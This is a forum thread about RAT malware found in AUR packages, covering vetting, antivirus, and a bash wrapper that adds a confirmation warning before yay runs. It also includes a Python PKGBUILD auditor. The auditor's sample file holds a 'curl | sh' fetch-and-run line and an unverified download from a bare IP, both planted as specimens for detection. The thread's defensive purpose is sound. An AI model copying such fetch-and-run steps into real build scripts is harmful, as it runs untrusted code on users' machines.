Malware RAT, Github AUR question?

Perhaps there ought to be a change, we can’t allow AUR to be a possible “cesspool” for rogue packages. Many ppl are now going open source & others might want to stop that with threat actors. :folded_hands:

  1. What is the best way to deal with AUR please? Install clamAV?
  2. Does AUR have any vetting process like Fdroid etc?

Thanks :blush::folded_hands:

1 Like

Best way seems to be, as mentioned here multiple times, to be careful about what you install on your system.

But I’m curious about ClamAV also. I rarely see it mentioned and I’ve seen divided opinions about it.

What do people here think about ClamAV? And do we know if it would have caught those RATs? (Maybe someone dl’d one of those packages for analysis?)

There are threads around here about AV programs and people’s thoughts. However, to not hijack this thread with a new subject, it would be best to start a new thread; since we now have a higher threat level, this could be an interesting subject.

Call me paranoid if you like, but I’m wondering if the blatant (and let’s be honest, not very good) attacks are a smokescreen for a more subtle and professional one.

1 Like

Maybe we should add something like this over yay?

A simple script snippet in the .bashrc :wink: acting like a portal would be cool as an option in yay itself:

1 Like

Well I don’t know, but I do know so far they have been blatant. So far it’s stuff that a USER must install. Unlike the xz issue we faced earlier in the year. I have thought that said user could actually be a decoy user :grimacing:. Again this is no different than if you were using Windows. At the end of the day it’s the USER’s vigilance which will keep them from downloading these programs to start with. I keep a minimum of packages installed from the AUR. I always try to go with OFFICIAL packages. However even OFFICIAL packages can become infected and that is why it is important to always stay vigilant. Keep in touch with the community, read the news. BE An ACTIVE USER.

2 Likes

Would that work with other AUR helpers?

For instance paru?

Yeah, it’s only a script that runs before it starts the binary, asking yes or no, and stops on that.

```bash
# Shell function that shadows the yay binary: prints a warning and asks for
# confirmation before handing the arguments to the real /usr/bin/yay.
yay() {
    echo -e "\e[1;31m\e[1mWARNING\e[0m" >&2
    echo -e "\e[0;33mYou use yay, which allows you to build and install AUR packages.\e[0m" >&2
    echo -e "\e[0;33mAUR packages are user-produced content.\e[0m" >&2
    echo -e "\e[0;33mThese PKGBUILDs are completely unofficial and have not been thoroughly vetted.\e[0m" >&2
    echo -e "\e[0;33mAny use of the provided files is at your own risk.\n\e[0m" >&2

    # Only an explicit y/Y continues; anything else (including just Enter) aborts.
    read -rp "Do you want to continue? (y/N): " confirm
    if [[ "$confirm" =~ ^[Yy]$ ]]; then
        /usr/bin/yay "$@"    # full path, so the function does not call itself
    else
        echo "Aborted."
        return 1
    fi
}
```

Add this to your .bashrc :wink: You can replace yay with paru, and sure, a script could catch more apps in one.

1 Like

Awesome.

Even though I normally hate crap like this, I do think we should add this. Way too many NEW users coming over who unfortunately aren’t informed enough about the package management system, and with the attacks we’ve had in the AUR this year and with the share increasing, I suspect it will only get worse as it goes.

This is something simple and can be removed by more advanced users who are aware of what they are doing. Great idea.

1 Like

Guess I already found the answer to my question, so not worth a new thread I guess.

https://www.virustotal.com/gui/file/37a66fbe73a9d5186b7d474e27fb8802dfef711715fa4818f722cf0bbfae0405

1 Like

If you can’t allow AUR to be a “cesspool”, hire people for scanning any new or updated PKGBUILD.

  1. ClamAV is useless in this case: you don’t look for a virus, you look for a bad/suspicious source URL inside a PKGBUILD.
  2. F-Droid’s process is more like an official repository of a Linux distribution.

1 Like
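Worked example added here (not code from this thread, nor from yay or paru): a small Python audit of a PKGBUILD’s `source=` array along the lines of the reply above, i.e. looking at where the downloads come from rather than scanning binaries for signatures. It parses the file without sourcing it (so nothing in the PKGBUILD runs on the reviewing machine), expands `$pkgname`/`$pkgver` for readability, and flags plaintext `http://` downloads, bare-IP hosts, hosts outside a familiar list, non-VCS downloads paired with a `SKIP` checksum, and `curl … | sh` lines inside the build functions. The `FAMILIAR_HOSTS` list and the sample PKGBUILD are constructed for illustration; they are not Arch policy or a real package.

```python
"""Audit the source= array of a PKGBUILD without executing it.

Added example for this thread; not code from the forum, from yay or from paru.
Assumptions: Python 3.8+, arrays written as plain NAME=( ... ) bash arrays;
FAMILIAR_HOSTS is a constructed illustration, not an Arch policy; the sample
PKGBUILD at the bottom is constructed, not a real package.
"""
import re
import shlex
from typing import Dict, List, Tuple

# Hosts a reviewer would usually not look at twice (constructed list).
FAMILIAR_HOSTS = {
    "github.com", "raw.githubusercontent.com", "gitlab.com", "codeberg.org",
    "files.pythonhosted.org", "crates.io", "sourceforge.net",
}
VCS_SCHEMES = {"git", "svn", "hg", "bzr", "fossil"}

# NAME=( ... ) up to the first ')', across lines. Parsed, never sourced.
_ARRAY_RE = re.compile(r"^(?P<name>[A-Za-z_]\w*)=\((?P<body>.*?)\)", re.M | re.S)
# Scalar assignments such as pkgname=foo / pkgver=1.2 (used for expansion only).
_SCALAR_RE = re.compile(r"^(?P<name>[A-Za-z_]\w*)=(?P<val>[^(\n][^\n]*)$", re.M)
_VAR_RE = re.compile(r"\$\{?([A-Za-z_]\w*)\}?")
_PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")


def parse_arrays(text: str) -> Dict[str, List[str]]:
    """{array_name: elements}; bodies are split with shell quoting rules and
    '#' comments dropped (an unquoted URL with a #fragment would be cut there)."""
    return {m.group("name"): shlex.split(m.group("body"), comments=True)
            for m in _ARRAY_RE.finditer(text)}


def parse_scalars(text: str) -> Dict[str, str]:
    """Plain NAME=value assignments, so $pkgname/$pkgver read as real values."""
    return {m.group("name"): m.group("val").strip().strip("'\"")
            for m in _SCALAR_RE.finditer(text)}


def expand(s: str, vals: Dict[str, str]) -> str:
    """Substitute $var / ${var} from vals; unknown variables are left as-is."""
    return _VAR_RE.sub(lambda m: vals.get(m.group(1), m.group(0)), s)


def audit_pkgbuild(text: str) -> List[Tuple[str, str]]:
    """Return (code, detail) findings, in order. Codes:
    http-source      plaintext http:// download, tamperable in transit
    ip-host          download host is a bare IP address, not a name
    unfamiliar-host  host not in FAMILIAR_HOSTS: worth a manual look, not proof of anything
    no-checksum      non-VCS download paired with 'SKIP' or with no checksum at all
    pipe-to-shell    the PKGBUILD itself pipes a download straight into a shell
    """
    arrays = parse_arrays(text)
    vals = parse_scalars(text)
    sources = [expand(s, vals) for s in arrays.get("source", [])]
    sums = next((arrays[k] for k in ("sha256sums", "sha512sums", "b2sums") if k in arrays), [])
    findings: List[Tuple[str, str]] = []
    for i, entry in enumerate(sources):
        url = entry.split("::", 1)[1] if "::" in entry else entry   # drop "localname::"
        if "://" not in url:
            continue                      # a file shipped in the package tree, not a download
        scheme, rest = url.split("://", 1)
        host = rest.split("/", 1)[0].rsplit("@", 1)[-1].split(":", 1)[0]
        if scheme == "http":
            findings.append(("http-source", entry))
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
            findings.append(("ip-host", entry))
        if host not in FAMILIAR_HOSTS:
            findings.append(("unfamiliar-host", entry))
        is_vcs = scheme.split("+", 1)[0] in VCS_SCHEMES   # git+https, svn+..., or bare git://
        if not is_vcs and (i >= len(sums) or sums[i] == "SKIP"):
            findings.append(("no-checksum", entry))
    for line in text.splitlines():
        if _PIPE_TO_SHELL_RE.search(line):
            findings.append(("pipe-to-shell", line.strip()))
    return findings


# Constructed sample PKGBUILD (not a real package): one ordinary tarball, one
# plaintext download from a bare IP with no checksum, one VCS source, and a
# build() that pipes a download into sh.
SAMPLE_PKGBUILD = r'''
pkgname=example-app
pkgver=1.2.3
pkgrel=1
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/example-app/archive/v$pkgver.tar.gz"
        "helper.sh::http://203.0.113.10/dl/helper.sh"   # plaintext, bare IP
        "git+https://codeberg.org/example/plugin.git"
        "example.desktop")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP'
            'SKIP'
            '1111111111111111111111111111111111111111111111111111111111111111')

build() {
    cd "$pkgname-$pkgver"
    curl -fsSL https://example.net/setup.sh | sh   # runs whatever the server returns
    make
}
'''

if __name__ == "__main__":
    for code, detail in audit_pkgbuild(SAMPLE_PKGBUILD):
        print(f"{code:16} {detail}")
```

A hit is a prompt to read the PKGBUILD, not a verdict: an unfamiliar host is often a perfectly good upstream. The useful moment to run something like this is the point where yay or paru offers to show the PKGBUILD before building, since that is the file the check reads.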

Why not a Windows-like confirmation? After
"Do you want to continue? (y/N): "
once more:
"Do you really want to continue? (y/N): "
:grinning_face:

1 Like

Also look out for a process “systemd-initd” in tmp.

We need to raise funds to guard AUR.

We can’t depend on big tech to host the repos for open source. :face_with_monocle:

See:

I will say that so far the community has done a remarkable and under-appreciated (no one ever praises the detectors) job of catching this stuff quick.

So there seems to be a good system in place already. Unless, of course, these shenanigans escalate

2 Likes

Well, we could. Then again, a “terminal-centric distro” user should know what (s)he is doing.

It’s debatable. Should we bloat and start trying to protect everyone from themselves? Or shouldn’t we?

Wouldn’t like to see EOS end up like governments, or Windows… “Yes, I know what you want, but we know better and instead do the other thing! This is just to protect you, understand.”

Might be a good thing for newbies, though. Who should probably start with another distro in the first place…

I’m undecided.

I do think about it, but it is still only an idea, and adding that will not prevent stupid acting at all. Only adding a stop point is no more than a reminder. Not everyone is getting the info... not everyone? More like no one reads any info at all nowadays :wink:

And in the end it is about keeping people safe, not preventing them from doing stupid things.

1 Like

Yeah, no one reads anymore. :frowning: :sad_but_relieved_face:

Just yesterday watched a YT video titled “Linux after one year”, thinking it would present a conclusion after a year of Linux usage.

Instead, it was 60 minutes showing a guy wanting to pass a GPU on to a VM, talking to ChatGPT and planlessly copy-pasting everything that that Artificial Idiot told him. Over weeks. I seem to remember he even changed the Linux distro.

In the end, the worst outcome: It worked, but he didn’t know why, and said himself he would never be able to reproduce that setup. Pity. The only ones “learning” seem to be the AIs nowadays.
Do we really want yet another “Do you want to this…?”, “Do you want to that…?” For instance, I usually know what I’m doing and I’m already frustrated about the many “Yes/No/This/That” questions. I mean, okay, I did make it ask for PKGBUILD inspection and stuff, and I have a Timeshift hook, and lots of other stuff.

I mean I know users: The more questions we ask, the more lazy they get, count the number of RETURNs necessary to “get it installed, for god’s sake!” and never read anything again.

Can’t we just say “With great power comes great responsibility!” and leave it at that? Or (if your proposal is for the installer) make it an option like “Warn about AUR” that could be enabled by default, but also checked off?

Better than having to edit the .bashrc or whatever and opt out the hard way, don’t you think?

1 Like

Nobody is actually suggesting that there IS a resolution to the problem. The problem is fully acknowledged and expressed in warnings about using the AUR.

There are multiple alternatives to this.

If you want to actually fix the issue (I mean fully resolve) with AUR, perhaps, in time, you can acquire enough staff to fully curate not only new entries, but also monitor all changes to all of the packages and pkgbuild scripts also… though I’d suggest you start up your own ‘AAUR’ because the AUR currently has a fair few projects (Repology says around 296180; total individual packages: 4519169).

As you import them, you must fully curate each one and check all links and binaries contained therein - going forward, you must also cater for the fact that many AUR scripts pull in software from external sources - sometimes a Snap, sometimes a DEB, sometimes an RPM - and you must also extend your vigilance to cope with the fact that a legitimate AUR entry pulling in a legitimate source code might be undermined if that source code changes to include malware.

Your job becomes exponentially more complicated with each level until you realise you’re dealing with an inclusive and accessible way for any Arch user to upload repositories, which means you are taking on the task of curating the entire web…

There’s a lot to be included in the phrase ‘they should…’. For starters - who are ‘THEY’ and how many do you think there are?

If you want to live in a Kindergarten, then you must stay inside the Kindergarten… On the most basic level, your SAFE environment (as safe as it’s reasonable to expect) is the Official Repository.

The AUR gives us access to the outside which cannot be fully curated.

3 Likes

Hiring people does not work with open source projects like Arch, EOS, etc. There is a limited budget. Hence there is a need for other solutions. Also it is not clear whether ClamAV will be able to help while downloading using yay or paru or other helpers.

This becomes doubly important as Windows 10 sunset is coming and Windows 11 is not palatable by a significant portion of users. Many of these users who would look to Linux, EOS or Mint or something else would be put off by this.

It is very easy to forget that many users of EOS and Linux want to just use the OS. They do not want to work on EOS. Like a car or electrical appliances. Most of the users just want to use it. They do not want to know the internals and how they work. Unless the Linux community understands this, Linux on Desktop or as primary work driver will remain elusive to people like us.

It’s you who want a free solution; tell me what they are.

People have been using Windows for decades and they will continue to use it. If they want to switch to Linux, they can choose a distro that is not Arch based, then the AUR “problem” is solved.

People pay for a car or electrical appliances; if they expect Linux to bring the same “warranty/service” for free, they’re in denial.

You know what? The Linux community is not homogeneous, and I’m sure many Linux users don’t care if Linux remains elusive to some people.

1 Like